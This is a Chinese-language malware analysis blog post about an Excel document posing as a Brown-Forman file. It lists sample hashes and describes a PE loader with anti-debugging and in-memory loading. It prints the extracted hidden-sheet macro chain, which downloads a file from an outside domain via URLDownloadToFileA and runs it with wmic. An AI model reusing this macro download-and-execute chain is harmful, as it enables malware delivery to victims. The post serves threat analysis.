仿造Brown-Forman恶意文档分析

  1. 起因
  2. 分析过程
  3. 技术总结

起因

信息来源:https://nitter.domain.glass/Arkbird_SOLG/status/1400845444889120783#m

分析过程

VT查杀:https://www.virustotal.com/gui/file/b8226e0691779280f1cbbcba93d41e01bc26a7ad37c88bc3b835e72c1376a7fe/detection

MD5    4fb331e4e5c6094e731690371687b110
SHA-1    bcecaaba6462550c61f7ed572e2c06ef8f3f378a
SHA-256    b8226e0691779280f1cbbcba93d41e01bc26a7ad37c88bc3b835e72c1376a7fe
Vhash    ec726ed39dd1773fb0790767871cde5c
SSDEEP    12288:HMc+2YnB6YTbkvA00E+XvQNBzcytqew5W99QPR69Ke+SajzvEnj/igo7tbhzdSNN:H8sYvkhRzdoW9yRCh+vwnj/it7vBSj
TLSH    T148F423A542CEFD48EA3A3D3761C5039DA197ACEB93150F420E73DB22D99A6F32511F18

执行流程

下载下来,打开是典型的隐藏表执行宏

逐个提取出里面的vba,得到的结果是这样的

Auto_Open
=AB16() ;=FORMULA.ARRAY('reierj ntrutruiret eruireur'!AJ17&'reierj ntrutruiret eruireur'!AJ18&'reierj ntrutruiret eruireur'!AJ19&'reierj ntrutruiret eruireur'!AJ20&'reierj ntrutruiret eruireur'!AJ21&'reierj ntrutruiret eruireur'!AJ22&'reierj ntrutruiret eruireur'!AJ23&'reierj ntrutruiret eruireur'!AJ24,AB17)
=Z16() ;Z16=CALL(AB17,AC17,"JCJ",AD16,0) //Kernel32,,JCJ,C:/Users/Public,0
=CALL("UR"&'reierj ntrutruiret eruireur'!AM18,'reierj ntrutruiret eruireur'!AN17&'reierj ntrutruiret eruireur'!AN18&'reierj ntrutruiret eruireur'!AN19&'reierj ntrutruiret eruireur'!AN20&'reierj ntrutruiret eruireur'!AN21&'reierj ntrutruiret eruireur'!AN22&'reierj ntrutruiret eruireur'!AN23&'reierj ntrutruiret eruireur'!AN24&'reierj ntrutruiret eruireur'!AN25&'reierj ntrutruiret eruireur'!AN26&'reierj ntrutruiret eruireur'!AN27&'reierj ntrutruiret eruireur'!AN28&'reierj ntrutruiret eruireur'!AN29&'reierj ntrutruiret eruireur'!AN30&'reierj ntrutruiret eruireur'!AN31&'reierj ntrutruiret eruireur'!AN32&'reierj ntrutruiret eruireur'!AN33&'reierj ntrutruiret eruireur'!AD17,AH24,0,A96,'reierj ntrutruiret eruireur'!AD16&'reierj ntrutruiret eruireur'!AE16,0,0) //URLMon URLDownloadToFileA JJCCBB,0,https://opposedent.com/css/main.css  C:/Users/Public//send.css
=AE25()  ;EXEC("wmic process call create 'C:/Users/Public/send.css'")


//
远程下载https://opposedent.com/css/main.css 保存在C:/Users/Public/send.css,wmic创建进程执行C:/Users/Public/send.css

main.css
MD5 6f891127db5efdb86a63c7a60a96103f
SHA-1 590945c764eb6acccadba94c02d0bc710886f865
SHA-256 944e1871cecddd5c18a8939f246e5f552cb24f0b0179f4902c0559b2ad3d336b
Vhash 075066551d1d15155az5e!z
Authentihash da7ab1728350ba9cf4a5f8dfa807d89002ad70db8c76829562500c0044776b37
Imphash 60f1da2d26406f6f3578f73785af8e9a
Rich PE header hash 004ccbc588d0cc025f006eb509f7f855
SSDEEP 12288:cGMMRFE7g6Ys/K7zyfuJTsQp4Cp6y5SrL1znr2LphlYuGUoPavYWIJdvrQoDpNkr:9zwRYs/K7ziuKU4jALFYuGDQ2vQoDkRN
TLSH T10AF48D307A52C038F5FB21F85AA9DE34941DBAB0671C68CB63D55EE9D6385F89C3021B
PE查询结果

VC写的,x86,开了ASLR

整体流程是:

1. 延时几秒
2. 反调试检测
3. 获取当前进程路径
4. 读取自身,设置文件指针,文件数据读取
5. 内存区域更改
6. 加载执行

反调试检测

加载对应的DLL和实例化对应的API

读取自身

加载对应的DLL和API

内存加载的PE

调试过一遍后,没看出什么危险的操作。利用沙箱运行得到以下结果
https://s.threatbook.cn/report/file/944e1871cecddd5c18a8939f246e5f552cb24f0b0179f4902c0559b2ad3d336b/?env=win7_sp1_enx86_office2013

技术总结

1. Excel隐藏表执行宏
2. 反调试,反沙箱
3. 读取自身内存加载PE执行

能力有限,勿喷


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:仿造Brown-Forman恶意文档分析

本文作者:九世

发布时间:2021-06-09, 01:47:43

最后更新:2021-06-09, 02:00:24

原始链接:http://422926799.github.io/posts/5245e2ed.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录